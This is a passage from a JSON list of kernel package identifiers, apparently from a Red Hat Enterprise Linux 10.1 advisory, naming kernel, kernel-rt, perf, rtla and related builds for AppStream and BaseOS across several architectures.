"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
